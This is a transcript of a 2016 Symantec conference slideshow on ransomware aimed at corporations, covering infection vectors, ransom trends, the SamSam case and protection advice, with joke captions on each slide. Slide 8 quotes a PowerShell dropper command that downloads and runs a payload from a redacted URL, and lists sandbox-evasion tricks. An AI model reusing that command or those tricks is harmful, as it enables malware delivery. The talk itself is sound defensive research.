Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Corporations - the new victims of targeted ransomware


Published on

Candid Wueest, Cyber Security Conference 2016

Published in: Software
  • I am really happy with the car I got at auction. What a great deal. Thanks for your service and for your help. ☞☞☞
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

Corporations - the new victims of targeted ransomware

  1. 1. Copyright 2016, Symantec Corporation Candid Wüest Symantec Security Response 1 Corporations – the new victims of targeted ransomware
  2. 2. Copyright2016,SymantecCorporation Ransomware is popular… … because it is profitable 2
  3. 3. Copyright2016,SymantecCorporation 3 © Forbes
  4. 4. Copyright2016,SymantecCorporation WHY ? 4What if there were no hypothetical questions?
  5. 5. Copyright2016,SymantecCorporation Because it is profitable! $ 209 Million damage Jan-March 2016 (according to FBI) 5A clear conscience is usually the sign of a bad memory.
  6. 6. Copyright2016,SymantecCorporation • Email – Link to malicious file on Dropbox & Co. – Office document with malicious macro – Script file (JavaScript, VBS, PowerShell, …) • Sometimes in container (Zip, RAR, HTA, WSF, LNK,…) with password • Infected Websites – Web exploit toolkits (1.4 Mio attacks blocked / day) • Rig, Magnitude etc. – Malvertisement • With any coding language out there – Incl. Python, Powershell, JS, Google's Go Language,… The common infection vector 6Hard work never killed anyone, but why take the chance?
  7. 7. Copyright2016,SymantecCorporation Enabling Macros with Social Engineering 7I don’t suffer from insanity; I enjoy every minute of it.
  8. 8. Copyright2016,SymantecCorporation Infection droppers trends Use of scripting languages to evade detection/sandboxes – Obfuscated: JavaScript, PHP, PowerShell, Python, VBS,… – JS conditional compilation trick /*@cc_on @*/ – Macro to check for VM (environment checks) • “InkPicture_Painted” instead Document_Open() or AutoOpen() trigger • Application.RecentFiles.Count <3 – Script to check IPs before payload download (e.g. MaxMind service) • Payload execution – Execute dll with rundll32.exe and export string – Seed parameter from JS (to decrypt payload) – Encrypted archive or installer package 8 powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://********lied', $f); (New-Object -com WScript.Shell).Exec($f) 2 + 2 = 5 for extremely large values of 2!
  9. 9. Copyright2016,SymantecCorporation Powershell ransomware 9I used to be indecisive. Now I'm not sure.
  10. 10. Copyright2016,SymantecCorporation Ransomware Cryptolocker expansion 10 100 new families identified in 2015 77 in 2014, 88 in 2016* CAPS LOCK – Preventing Login Since 1980.
  11. 11. Copyright2016,SymantecCorporation Ransomware-as-a-service 11I'd like to help you out, which way did you come in?
  12. 12. Copyright2016,SymantecCorporation Top 10 infections on 29.10.2016 12… error joke not found
  13. 13. Copyright2016,SymantecCorporation Show me the money 13 $372.53 $294.14 $679.65 $0 $100 $200 $300 $400 $500 $600 $700 $800 2014 2015 2016 • Ransom is usually requested in Bitcoins • The average ransom has more than doubled last year Artificial intelligence is no match for natural stupidity.
  14. 14. Copyright2016,SymantecCorporation How to make even more money? • Payment features – Tesla chat support and free sample decryption – CryptXXX steals Bitcoin wallet data – Cerber adds machines to botnet to carry out DDoS attacks. – Use of Amazon/iTunes/phone gift cards instead of Bitcoins • New threats added to ransom note – Chimera threatens to post personal data online – Jigsaw deletes random files over time – Stampado re-encrypts already encrypted files from other cryptolockers – Virolock Spreads to shares and cloud storage as fileinfector 14I didn't say it was your fault, I said I was blaming you.
  15. 15. Copyright2016,SymantecCorporation Where are the victims? 15 3%Canada 8% 5% United Kingdom Belgium Netherlands India3% Italy 3% 4% Germany 2% Australia 4% 8% Japan United States 31% Is “NO” the correct answer to this question? Currently big wave in Brazil
  16. 16. Copyright2016,SymantecCorporation 16 Businesses as a target 43% of ransomware infections occur inside organizations Employees like to open private emails at work Smith & Wesson: The original point and click interface.
  17. 17. Copyright2016,SymantecCorporation Advanced attack techniques 17 Recent ransomware attacks use tactics and techniques typically seen in “APT”-style attacks Infiltration Exploit server-side vulnerabilities to gain access to the network. Reconnaissance Attackers gather information that may help in later stages of the attack, such as back-up policy. Information gathered may also be used in the ransom note. Lateral movement Attackers use publicly available tools to plot out and traverse the network and gain access to strategic locations like ICS or DB systems Stealth Once the attack has been successfully carried out the attackers attempt to hide their tracks by removing any tools used. What happens if you get scared half to death, twice?
  18. 18. Copyright2016,SymantecCorporation Example: SamSam case • Entry point was unpatched web server; exploited JBoss vulnerability with JexBoss • Used psExec and retrieved passwords to traverse the network • Deleted backups to make recovery difficult • Deployed SamSam strain of ransomware • Removed copies of malware and associated tools to hide tracks • Ransom was 1.5 Bitcoin (~US$989) for each computer 18Everyone is entitled to his own opinion, but not to his own facts.
  19. 19. Copyright2016,SymantecCorporation Further TTPs seen • Attack remote access tools – Bruteforcing passwords for RDP, Teamviewer, VNC, FTP, … • Exploit webserver and jump further from there – SQLinjection to modify DB content • Spear phishing • Some groups try POS or BEC scams first, and then move to ransomware • Some «ATP» groups use ransomware instead of wiper to hide intention 19I can explain it to you, but I can not undestand it for you Not very sophisticated But often successful
  20. 20. Copyright2016,SymantecCorporation What are they after? • Documents • Databases (encrypt data or change password) • Fileshares/cloud (even if not mapped: passwords from mimikatz or enumtools) • Websites – E.g. added «mcrypt_encrypt()» to DB calls • The backups (to delete them, infect them or encrypt them) • In some rare cases industrial controller, more likely classical blackmailing 20If I agreed with you we’d both be wrong
  21. 21. Copyright2016,SymantecCorporation Victim organization profile Services 37.8% Manufacturing 17.2% Public Administration 10.2% Finance, Insurance, & Real Estate 9.8% Wholesale 8.9% Transportation, Comms, & Utilities 6.6% Retail 4.3% Construction 3.9% Mining 1.0% Agri, Forestry, & Fishing 0.5% What about Healthcare? Healthcare seeing more targeted attacks and therefore not reflected in the numbers 21All generalizations are false.
  22. 22. Copyright2016,SymantecCorporation Crypto is difficult (for most people) 22Press SPACEBAR once to quit or twice to save changes..
  23. 23. Copyright2016,SymantecCorporation Protection strategies • Backup your data (out of reach!) • Keep your system and software up-to-date • Doublecheck shared folders – Does it auto sync to cloud? – How is your fileserver protected? • Follow best practices (2FA, security software,…) – Disable scripts, powershell etc. if you dont use it • Be prepared - play the exercise drill • Some have experimented with «honeyfiles» and «folder-sinkholes» 23Always remember you're unique, just like everyone else.
  24. 24. Copyright2016,SymantecCorporation Don’t forget your phones 24 • Android Ransomware is out there • IoT device ransomware not seen at large in the wild, but possible
  25. 25. Copyright2016,SymantecCorporation  100 new families identified in 2015, most not sophisticated  Scripts are popular to evade first-step detection  Employees in organizations represent 43% of infections  There are ransomware groups going after organizations  Most attacks are not targeted, but still devastating  It is profitable for the attackers, so it won’t go away overnight Summary – keep your data safe! 25Better to understand a little than to misunderstand a lot.
  26. 26. Thank you! Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice. Threat Researcher - Symantec Security Response Candid Wüest
  27. 27. Copyright2016,SymantecCorporation 27I like birthdays, but I think too many can kill you.